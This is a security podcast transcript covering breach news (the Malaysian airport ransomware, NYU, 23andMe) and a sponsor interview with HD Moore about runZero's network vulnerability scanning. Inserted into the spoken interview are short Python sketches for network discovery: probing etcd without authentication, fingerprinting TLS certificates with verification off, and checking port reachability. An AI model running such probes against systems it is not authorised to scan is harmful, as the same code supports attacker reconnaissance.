come on, you gotta help us to do better exclusions here
because we don't wanna get in trouble with the court.
And that's the way it should be.
Yeah, agreed.
Speaking of Citizen Lab, they've
got a great Q&A with the founder, Ron Deibert, and it really just does go into how they do a lot of
this research and what their day-to-day process is for trying to look at spyware samples and examine
the infrastructure and do attributions and whatnot. It's a really good Q&A.
Yeah, no, it's a good interview.
I think Ron Deibert is out there promoting a book
that he's written, released earlier on this year,
talking about kind of how Citizen Lab came to be
and the work that they do.
And you know, it's kind of interesting
because I hadn't really, you know,
I'd never really thought about the history of Citizen Lab,
like how they came to be where they are
and now the two kind of original guys work together to do what they're doing. So yeah, definitely good interview. I haven't read the book yet, but I've added it to my list of things to read.
There you go. And that one was done by Suzanne Smalley over at The Record. And yeah, nice work
because that was a really good Q&A. Now we've got a report here, another one from The Record.
John Greig has reported that the Malaysian Prime Minister had
just rejected a ransom demand when there was a ransomware attack against the
major airport in Malaysia. It's nice to see, I mean he had some pretty
strong comments just saying, there's no way this country will be safe if
its leaders and system bow to ultimatums by criminals and traitors, be it from inside or outside the country.
I think that's fair enough, but I also think there's situations where there's no other
choice.
Thankfully, it doesn't look like this was one of them, although it looks like they were
like doing a lot of stuff at that airport on whiteboards and whatnot, just to keep going.
Yeah, yeah.
I mean, there are alternatives, but that alternative is some guy who has to stand in front of a whiteboard
constantly writing flight information all day long, and his hand must be very sore at the end of the day.
Catalin actually has a picture of the whiteboard in question in today's Risky Bulletin.
So if you want to see it, you can click through and have a look at that, yeah, it's I feel I feel bad for that guy
Yeah, we've also seen a major hack at NYU New York University someone obtained data on millions of
students there and, you know, claimed to be posting the data to prove that NYU was doing admissions that favored
Black people and Hispanics last year in contravention of a Supreme Court ruling that essentially ended affirmative action in the United States.
So the group has a racist name as well.
So yeah, ew, yuck.
And meanwhile, in Perth too, I mean, it's a small university, I guess in the grand scheme
of things, but Notre Dame University in Perth has been going through an incident that is just causing like all sorts of drama for the students and staff.
So I've linked through to that one in the show notes. And finally, Adam, we're going to end on this story.
A number of outlets are reporting on it, but we've linked through to the 404 Media report on it by Jason Koebler, which is 23andMe has filed for bankruptcy protection and is selling itself,
trying to find a buyer, a new home for the company, which means the DNA information of
15 million people is now up for grabs, which is a very 2025 dystopian cyberpunk future
sort of thing to wrap your head around.
Yeah, yeah, it really is.
I mean, and like, you know, it's one thing to lose your privacy,
one thing to lose your password, but losing your genetic information? Like, what are you
supposed to do? Like, go change your genes at a genetic clinic? That's probably also
going to get hacked. But yeah, very cyberpunk, unfortunately. And I guess, yeah, the advice
that the California Attorney General was saying is like, if you have used 23andMe and you still have your account credentials,
log in and ask them to delete it now while you still can, because once they've sold it,
then who knows what it's going to be used for. We have seen other companies that have
collected genetic information, you know, that have subsequently sold the data and we've
seen it being used for, you know for other things that were not intended.
Well, I think one of the points though here is that it doesn't matter if you've been
a customer.
I mean, anyone who's related to you and I, you know what I mean?
If they've done it, I mean, that is a degree of exposure.
I think it's very interesting to see that these services have been used for crime fighting as well.
And, you know, really hard to blame the cops for taking DNA samples and just sending them into 23andMe
to see if they get any matches, which is what they've done previously.
But yeah, it's kind of nuts, right?
That that store of data is just going to wind up who knows where.
Could be private equity.
Could it be sold
to a foreign party? I don't even know what the data regulations on that are, you know?
Yeah, I mean, there was a one of the other companies that previously got sold got sold to the
Dutch. I don't know if there were originally a Dutch company or where it came from. But yeah,
like just deeply cyberpunk and, you know, past me wants to be here for the cyberpunk future because
I read a lot of books as a kid, as a teenager about what that future would look like, but
actually living it, I don't know that I'm that keen on it now.
Got to watch The Dutch, mate.
Got to watch The Dutch.
All right, we're going to wrap it up there.
Adam Boileau, thank you so much for joining me on the show.
To talk through all of that, always a pleasure and we'll do it all again next week.
Yeah, thanks Pat.
I will talk to you then.
That was Adam Boileau with a run through of the week's security news.
Big thanks to him for that.
It is time for this week's sponsor interview now with HD Moore who is a founder, one of the founders of RunZero which is an asset
discovery platform, I guess you'd call it. You can throw it at an IP range and it
will find your devices. It does it in a very intelligent way, it can even find
stuff that you wouldn't expect it to because it's full of HD Moore tricks. You
can give it creds to your cloud environment and it can go and
scan from the inside of your cloud environment and find, you know, take an inventory basically
of everything that you're running.
Now one thing that HD has been working on and RunZero is pushing a new release which
does this is using RunZero as a vulnerability scanner basically.
And this kind of surprised me because vulnerability scanning, vulnerability management, it's such a mature market.
It's one of the oldest sort of product types in cyber security.
But as you're going to hear,
HD thinks that the majors have kind of atrophied a bit,
especially in that, you know,
especially when it comes to the capability of being able to point a scanner at
like an IP range or at an environment and getting it to bring back
information. He says it's all gone to, like, you know, CrowdStrike checking,
you know, file hashes on an endpoint to figure out versions of software or doing
authenticated scans or whatever, which is why nobody seems to know or find out
when they have a vulnerable Fortinet at the edge of their network, right?
So he's taken RunZero and given it a vulnerability scanning capability, which finds high impact
stuff that people really need to deal with pronto. So here is HD Moore talking about
that. Now what we're seeing is all the legacy solutions out there are either reporting irrelevant
vulnerabilities or not reporting the ones that are actually critical that'll get you
owned. So we're taking all the same discovery information, asset information, inference we're doing on the
fingerprinting side and using that to identify what is the most likely route of compromise in
your organization and bubbling that to the top without just filtering someone else's list of,
you know, poorly chosen vulnerabilities. But I mean, isn't that what vuln scanners are supposed to do?
They're supposed to do that, but they haven't been doing it in a long time. I mean, the challenges are folks doing agent-based vuln scanning are missing the entire network
context, and folks who are doing authenticated-based vulnerability scanning are now missing all
the vulnerabilities and exposure on their IoT and unmanaged assets.
So either way, you're really not getting what you're paying for.
And if you look at what vulnerabilities are being used to exploit in companies and organizations
more often, half the time these things don't even have CVEs or they don't have a CVE till three weeks
afterwards. Yeah, right. So what? They're not even scanning for stuff unless it has a CVE or it's in
NIST or whatever. Yeah. There's some agent-based vuln scanning right now that only reports software
with CVEs. So by definition, you're not going to get coverage for that until it's probably too late.
I mean, this is the way though, like what you're describing RunZero does. I mean,
this is the way vuln scanners used to work.
You would essentially give them an IP range and say, go.
And I understand that IP ranges these days are less useful because we've got so
much stuff in the cloud and so on and so on.
But that's what they used to do.
They used to go out there and actually find stuff, scan it, probe it, and
then figure out what vulnerable stuff was running.
You're telling me now that it's all authenticated scans
and endpoint stuff and no one's really doing that.
There's a tiny, tiny fraction of coverage
that's being pushed out by all the main vendors
that's unauthenticated to remote.
And it's such a small portion, it's
almost irrelevant to the number of checks overall.
Also keep in mind there's something like 260,000,
270,000 CVEs out there.
And even the best vulnerability scanners
only cover about half of that.
If you look at the ones that cover exploitable software,
they cover such a small portion of the exploitable,
of the exploit covered vulnerabilities.
It's also kind of a crime.
Like if you look at what's the coverage of Nexpose
versus Metasploit, for example,
there's still not a perfect overlap.
You still have vulnerabilities
that there's an exploit for in Metasploit
where there's no coverage in any major vulnerability scanner.
How are people finding bugs in their Palos and their Fortinets and stuff right now?
Like how's that process supposed to work when these scanners aren't really doing that job anymore?
That's a good question. I mean, what's happening now is you hear about it in the news and you hope
you get ahead of it before someone compromises your box. And then a week and a half later,
Palo Alto gives you a patch and you hope that over the weekend in between you weren't compromised
and you know, digging out Chinese IOCs. So it's kind of like the way the world right now we're seeing exploits moving so
fast but the time you hear about it's almost too late. So what we try to do at RunZero
is help you identify where that technology exists and get ahead of it as quick as you
can. So it's not a question of is my Palo Alto unpatched? Of course it is. The bug just
came out an hour ago. Where is your Palo Alto? Where is it exposed? Do you know where your
backup appliances are? What mitigating controls do you have in place?
You know, we were talking before we got recording and I mentioned that like in the early days
of Risky Business, sort of, you know, 2007 to 2010 timeframe, the way that I ran this
business is I would just have four sponsors every year, right?
And I would sell 25% of the sponsorships to like, you know, four companies.
And one of them was Tenable.
And this is when Tenable, I think when they first sponsored, they had like 20 people.
And, you know, they would provide, you know, great content and whatever.
And it was, yeah, all very wonderful.
And then at some point, I think what?
They listed and then the founders left.
And it just turned into a very different type of business, right?
It turned into a very sort of normal business, less of a, you know,
people who care about security style of business.
No offense to the, you know, I'm sure wonderful people who remain at Tenable,
but it seemed like the innovation kind of stopped there for a while. Do you think that,
you know, the atrophy in capabilities in volume scanning is, is sort of part of that mature
product category syndrome? Is that kind of how we got here? Do you think?
A little bit. I mean, if you were being asked to grow, you know, 10 to 30% per year, every
year after you've been around for 20 years, you need to go find another category. You
need to go find something else to expand your business into. You don't want to make what
you currently have better. What's happened though, instead, is we've taken the eye off
the ball for so long in vuln management that you have entire companies and even small
industries coming out that all they do is filter the crap you get from one vendor, give
you a smaller
pile of crap to go address. And half the time they're starting off with the wrong set of vulnerabilities in the first place.
So, you know, an example would be you've got an exposed Mongo database on the network. No credentials.
Your vulnerability scanner doesn't report that. Your vulnerability scanner says, oh, I detected Mongo protocol, but that's it.
And so you're filtering through all your vulnerabilities. You're only looking at ones that are high and critical.
That never pops the top at all,
because it's not something that's even on the radar
as a high or critical CVE.
And now, you know, at the same time,
you now have your database open to the world
and no one's telling you about it.
So our model of kind of doing authenticated coverage
and software-based vulnerability coverage,
and then passing through as many filters as we can
to get the workload down has just resulted in us
doing all the wrong things
and missing the more important vulns. So when you run these types of scans against your customer base, what sort of stuff is falling out?
And of that, what's the subset that people are being surprised by? You know, when they see it
actually come out, they're like, oh my God. Yeah, we do some crazy stuff. So we're trying not to
add like a million different vuln checks and hit a thousand URLs in every web server in your network,
things like that.
A lot of what we're doing today is
taking the already amazing fingerprinting we have in runZero
and then turning that into vulnerability inference.
So we can say, because you're running
this version of this thing, therefore, you've
got these vulnerabilities, and we can prove it
because of these things.
As opposed to have to go through and do a secondary check
to say, are you vulnerable to x, y, and z?
So we're able to go through and identify problems based on what
we know about the asset.
Like if it's an end-of-life asset,
we know that it's got a bunch of vulnerabilities
and there haven't been any patches to that asset
since the firmware was last released.
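To make the "inference" idea concrete, here's a toy sketch of the general pattern; it is not runZero's engine, and the product names and version ranges in it are invented placeholders: take a fingerprinted product and version, compare it against known-bad ranges, and emit findings without ever sending a vulnerability check at the box.

```python
from dataclasses import dataclass

# Toy illustration of fingerprint-to-vulnerability inference. The entries in
# KNOWN_BAD are invented placeholders, not real advisories or vendor data.

@dataclass
class Finding:
    asset: str
    issue: str

KNOWN_BAD = {
    # product: (fixed_in_version, issue description)
    "examplecorp-vpn": ((7, 2, 4), "pre-auth RCE fixed in 7.2.4 (hypothetical)"),
    "examplecorp-nas": ((4, 1, 0), "auth bypass fixed in 4.1.0 (hypothetical)"),
}

def parse_version(v: str) -> tuple[int, ...]:
    return tuple(int(x) for x in v.split("."))

def infer(asset: str, product: str, version: str) -> list[Finding]:
    """Report issues implied by the fingerprinted product and version."""
    findings = []
    if product in KNOWN_BAD:
        fixed_in, issue = KNOWN_BAD[product]
        if parse_version(version) < fixed_in:
            findings.append(Finding(asset, f"{product} {version}: {issue}"))
    return findings

if __name__ == "__main__":
    print(infer("10.0.0.5", "examplecorp-vpn", "7.1.9"))
```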
Some of the problems we find that are really interesting
we've chatted about before in the show,
which are like our inside-out attack surface management.
We can identify the unique cryptographic fingerprint
of like an internal remote desktop server
and then scrape the internet
looking for anything that smells like it and say, Hey, this device internally
is actually exposed over here on a cellular link and you had no idea it was out there.
So we'll do some really neat things by combining the outside in data with the inside out scanning
data through unique correlation between those assets.
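As a sketch of that inside-out/outside-in correlation idea (hypothetical hosts and external dataset; not runZero's code): hash the certificate a service presents internally and compare it against certificate hashes observed from the internet side.

```python
# Sketch of inside-out/outside-in correlation: grab the TLS certificate a service
# presents, hash it, and compare that hash against certificates observed from the
# internet side. Hosts and the external sightings data below are hypothetical.
import hashlib, socket, ssl

def cert_fingerprint(host: str, port: int) -> str:
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # we only want the cert bytes, not validation
    with socket.create_connection((host, port), timeout=5) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            der = tls.getpeercert(binary_form=True)
    return hashlib.sha256(der).hexdigest()

# Fingerprints of certs seen on the public internet (e.g. from an external scan feed).
EXTERNAL_SIGHTINGS = {
    "3f1a...deadbeef": "203.0.113.50:3389 (cellular carrier range)",  # placeholder entry
}

internal = cert_fingerprint("rdp-host.corp.example", 3389)  # hypothetical internal host
if internal in EXTERNAL_SIGHTINGS:
    print(f"internal RDP cert also visible externally at {EXTERNAL_SIGHTINGS[internal]}")
```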
I mean, what's interesting here is like, you know, this is the modern twist on the old
school approach, right?
Where, you know, I'm thinking back like a million years ago, when if you wanted to look
at a network, the first thing you'd do is you'd nmap it, right? You might throw Nessus at an IP range or whatever. If you found any web servers,
you wouldn't even use Nessus. Then you'd use something like Nikto. Does Nikto even exist anymore?
Probably not, right? Surely not.
Nikto still does. It actually still finds things a lot of commercial vuln scanners
don't find.
That's amazing. Right? So yeah, you'd throw Nikto at a web server and whatever, and you'd,
you know, you'd sort of see what comes back.
Yeah, I'm just sort of surprised
that the whole thing's atrophied to the extent that it has.
And I'm guessing it's because vulnerability management
is such a huge compliance issue
that people just have to spend money on and tick the box.
And I guess that's where we are, right?
Arguably the market stopped rewarding innovation, right?
The more vulnerabilities your product found, the less your customers liked you because
you made them look bad.
Like, if you're succeeding at building a great vuln discovery platform, your customers
will have a worse score every time you put an update out because you're finding more
problems, right?
And customers hate that.
So I was in that kind of predicament early on in my career where we were doing vulnerability
checks specific to credit unions.
And every time we found a new vulnerability in an online banking system, our customers would,
you know, scream bloody murder because we gave them all, you know, critical risk scores. We're like,
yes, go to Jack Henry, get your stuff fixed. But they didn't like the fact that it made them look
bad, even though it was accurate. Yeah, I remember once a friend of mine did a pen test on an
online banking platform and found a bug, like the worst
type of bug, one that would let you log in as anyone, transfer money around,
whatever. And then, you know, he had to give them the devastating news that it
was a carryover bug and it affected their live environment as it stood that
day, because they were testing the new platform before it was deployed.
And the project manager was absolutely thrilled that it affected the existing platform, because
it did not affect their go-live for the new one.
So just an interesting story about incentives in security.
Now you gave us a bit of a rundown of the sort of stuff it finds and how it finds them.
But I'm guessing you've put this in beta for a little while now and some of your customers have used it. What are the things they're finding that have
surprised them? Because I imagine a lot of it, they're like, yeah, okay, we expected
to see that. But are there some categories that are popping up where they're just like,
oh my God, they didn't expect that? What are the unknown unknowns?
Now, the ones that I think have surprised people are like, when we look at an asset
and look at its vulnerabilities in runZero, we're not just asking,
is this asset vulnerable all by itself? We're looking at that asset in the context of all its neighbors and
friends and connectivity, everything else like that. So one thing we look for is shared
crypto keys. If you've got a machine using the same remote desktop TLS cert as another one in
the same network, or the same SSH host key, or the same TLS cert on some other service, oftentimes
that points to the machine being cloned. And they're like, oh, I didn't realize we cloned
our golden machine's crypto key a thousand times
and deployed it everywhere.
Not only is that machine extremely visible,
that key is now spread all across our internal systems.
So you find these kinds of weird, unexpected trust issues
around things like shared crypto keys.
And that's been a fun one.
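A toy version of that shared-key check, with made-up asset records: group assets by their SSH host key (or TLS certificate) fingerprint and flag any fingerprint that shows up on more than one host.

```python
# Sketch: flag assets that share the same SSH host key, which usually means a
# golden image was cloned with its key material intact. Asset records are made up.
from collections import defaultdict

assets = [
    {"ip": "10.0.0.11", "ssh_hostkey_sha256": "aaa111"},
    {"ip": "10.0.0.12", "ssh_hostkey_sha256": "aaa111"},
    {"ip": "10.0.0.13", "ssh_hostkey_sha256": "bbb222"},
]

by_key = defaultdict(list)
for asset in assets:
    by_key[asset["ssh_hostkey_sha256"]].append(asset["ip"])

for key, hosts in by_key.items():
    if len(hosts) > 1:
        print(f"shared SSH host key {key} on {len(hosts)} hosts: {', '.join(hosts)}")
```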
The other one we find a lot of is just
unauthenticated services, stuff just hanging out in the wind
like etcd, zookeeper, all these DevOps tools that are configuration databases,
attached to all these new-school virtual appliances shipped by vendors and exposed directly to the network. And no one really scans them very well, like the scanners don't cover them very well,
and no one's doing, you know, on-device scanning, because these things are vendor-managed appliances.
And they'll leak your crypto keys, they'll leak your secrets, they'll leak your API keys all over the place.
So between the unexpected configuration databases and other sorts of data stores being open to the world,
and the vulnerabilities that are only identifiable because there's an attribute
that's shared across more than one host, those tend to be the biggest sources of surprises with
our new capabilities.
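As an illustration of that unauthenticated-service case, here is a minimal sketch of a check against etcd's HTTP API; the target address is a placeholder, and a real tool would obviously cover zookeeper, consul and friends as well.

```python
# Sketch: check whether an etcd endpoint answers its HTTP API without any
# authentication. Target address is a placeholder.
import json, urllib.request

def etcd_is_open(host: str, port: int = 2379) -> bool:
    try:
        with urllib.request.urlopen(f"http://{host}:{port}/version", timeout=5) as resp:
            info = json.load(resp)
        print(f"etcd at {host}:{port} answered unauthenticated: {info}")
        return True
    except OSError:
        return False

etcd_is_open("192.0.2.20")  # RFC 5737 documentation address, replace with a real target
```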
Now it's interesting too, that you were talking about like authenticated scans as being kind
of like the devil's work these days, right? And to a degree, I certainly agree with you.
But you're kind of doing the same thing,
but in cloud environments as well, right?
Like you are doing authenticated checks
into cloud environments.
Like how's your approach there different
to the incumbents, right?
Because I'm guessing that you're not just sitting there
trying to spin up scripts that check
files right?
Like it's a bit of a different process.
Yeah.
If you look at like traditional CSPMs, what they care about is enumerating all your
stuff, trying to figure out what configuration problems you have, and saying, you've got this problem.
We try to do it both ways.
We try to both grab all your data from your cloud back into your inventory, bring it all
together, and then actually go scan it and ask what's actually reachable.
We don't have to trust that your security groups actually look like what we think they look like.
We'll actually go try to send a packet and see if we can get to it, and that's kind of a big difference.
It's not just, oh, it looks right.
It is a big difference, because if there's a misconfiguration that you're not checking for, it will manifest itself
when the rubber hits the road. You actually try to reach something and you can, and, I mean, well,
obviously something's wrong with the configuration. Yeah, we see wild stuff.
I mean a really common problem
I see is companies will set up internal VPNs into
an AWS VPC from the corporate network and they'll screw up the ACLs completely.
And so you can have everybody in AWS now shelling into internal machines or vice
versa. Right. So it depends on how it's configured, but we find a lot of
misconfigurations of VPNs, especially from cloud to cloud and hyperscalers.
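A small sketch of the "send a packet rather than trust the security group" idea, assuming boto3 and hypothetical ports; deriving the declared exposure from the actual security group rules is left as a stub here.

```python
# Sketch of "don't trust the security group, send a packet": take what the cloud
# API says exists and verify reachability with a real connection attempt.
# The port list is illustrative; declared_open is a placeholder for rule analysis.
import socket
import boto3

def tcp_reachable(host: str, port: int, timeout: float = 3.0) -> bool:
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

ec2 = boto3.client("ec2")
for reservation in ec2.describe_instances()["Reservations"]:
    for inst in reservation["Instances"]:
        ip = inst.get("PublicIpAddress")
        if not ip:
            continue
        for port in (22, 3389, 27017):  # example ports to verify
            declared_open = True  # in practice, derived from the security group rules
            actually_open = tcp_reachable(ip, port)
            if declared_open != actually_open:
                print(f"{ip}:{port} declared={declared_open} observed={actually_open}")
```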
Now look, one thing I wanted to get your thoughts on is, you know, we even work
with a sponsor here, Nucleus Security, and I know that you plug into them as well, right?
And what they do is they take the output of vulnerability scanners and sort of normalize
them and whatever so that you can get a pretty sensible idea of what the vulnerabilities
in your environment actually look like.
But the thing is, that's a company that only exists because
the amount of data that comes out of these things is overwhelming.
Like, are you a bit concerned that people are going to be like, well, the last thing
I need is more vulnerability information?
Like what have you done to sort of get around that?
Yeah, absolutely.
There's two things we do.
One is when we import data from, let's say like a Tenable or a Qualys or another platform,
we actually want to import the information level and the low level
vulnerabilities.
We don't necessarily need the highs and criticals;
those are great.
But what a lot of folks do is they just
ignore all the lows and infos.
But that's actually where all the best information is.
If you're trying to figure out does this device run
this service, is this protocol running,
is this database installed, those
don't show up in critical vulnerabilities
unless there's something even further wrong with it.
We just want to know if they're there at all.
So we parse all the information level vulnerabilities
from those products to figure out whether there's something
useful we can tell the customer.
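For illustration, a sketch of mining a scanner export for informational findings; the CSV columns and plugin names are invented, not any particular vendor's format.

```python
# Sketch: mine the "info" and "low" severity rows of a scanner export for
# service/protocol facts rather than discarding them. Column names, plugin
# names and the file name are hypothetical.
import csv

SERVICE_HINTS = {
    "MongoDB Protocol Detected": ("mongodb", 27017),
    "RDP Service Detected": ("rdp", 3389),
}

inventory = {}  # ip -> set of (service, port)
with open("scanner_export.csv", newline="") as fh:  # hypothetical export file
    for row in csv.DictReader(fh):
        if row["severity"].lower() not in ("info", "low"):
            continue
        hint = SERVICE_HINTS.get(row["plugin_name"])
        if hint:
            inventory.setdefault(row["ip"], set()).add(hint)

for ip, services in inventory.items():
    print(ip, sorted(services))
```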
Second, when we report a vulnerability natively
in the product, we don't just put it all in one big
vuln list and say, here you go.
Now we've actually done a new overlay on top
of what we call findings.
So we'll take a finding, which is,
you've got misconfigured databases,
or you've got internal management services
exposed to the internet.
We put them all into one big category,
put one big number on it and say,
this is the thing to go fix,
as opposed to each individual sub-issue behind that.
So instead of getting a list of a thousand vulnerabilities
with varying severity, you get a list of like five or 10.
So instead of starting off by just overwhelming the user
with a flood of vulnerability alerts,
we want to kind of pre-filter that down
into something that's actually relevant and matters to them,
something that's easy to action, you know, per exposure.
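A toy illustration of that roll-up from individual vulnerability records into a handful of findings; the categories and records below are made up.

```python
# Sketch: roll individual vulnerability records up into a short list of
# "findings" so the user sees five or ten actionable buckets instead of
# a thousand line items. Categories and records are illustrative.
from collections import Counter

vulns = [
    {"asset": "10.0.0.5", "category": "unauthenticated database exposed"},
    {"asset": "10.0.0.6", "category": "unauthenticated database exposed"},
    {"asset": "10.0.0.7", "category": "management service exposed to internet"},
]

findings = Counter(v["category"] for v in vulns)
for category, count in findings.most_common():
    print(f"FINDING: {category} ({count} affected assets)")
```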
Yeah, makes sense.
So final question, are you finding that people who are wanting to buy this and use it, I'm
guessing they're using it as an additional component of their vuln management program,
right?
Like they're not throwing stuff out to get this,
like on the vuln management side.
I know they are on the asset discovery side
and you've been having some real success there actually.
Taking market from some very large companies,
which is awesome.
I say that as an options holder in the company.
But in terms of like the vuln scanning side,
I'm guessing that because there's not really much
in the market that does this at the moment,
it's just additive.
Yes and no.
So what we're finding right now is a lot of customers have chosen to buy vuln management
from their EDR vendor.
So if you're a customer of an EDR vendor and you give them X dollars more per year per
endpoint, they'll say, here's a list of vulnerabilities.
But the vulnerabilities are only based on installed software.
They tell you nothing about the network exposure of that asset.
So oftentimes you have a company where all their Windows endpoints are being covered by, let's say,
Tenable and CrowdStrike.
And now they're trying to figure out,
well, I'm doing authenticated scans with Tenable
and I've got a CrowdStrike agent, do I really need both?
And we're saying, well, you're probably getting
the same information from both at that point.
So let's say if you stopped paying Tenable
and instead you pay a lot less per asset to runZero,
we're gonna tell you what all the network exposures are
of all those assets and you'll still get
the software inventory-based vulnerability feed from CrowdStrike.
So we feel like there's a better together there in a lot of cases, either with us plus an EDR,
or in some cases us plus vuln management. We also find cases where vuln management has only
been deployed to half of the company, either because it's too expensive or because it crashes
half the stuff in the network. And those are also cases where if you're already rolling out some
kind of agent-based vuln detection where you can, you're not losing a lot by missing the unauthenticated scans from these products, because they've fallen so far behind.
That's where RunZero can often do it cheaper, better, faster.
Yeah, awesome. Alright, HD Moore, always great to see you my friend, and yeah, we'll catch you in the next one.
Thanks again.
Thanks, Pat.
That was HD Moore from RunZero there, and you can find them at RunZero.com.
R-U-N-Z-E-R-O.com.
And yes, Americans, I said Zed, it's Zed.
But that is it for this week's show.
I do hope you enjoyed it.
I'll be back soon with more news and analysis for you all,
but until then, I've been Patrick Gray.
Thanks for listening.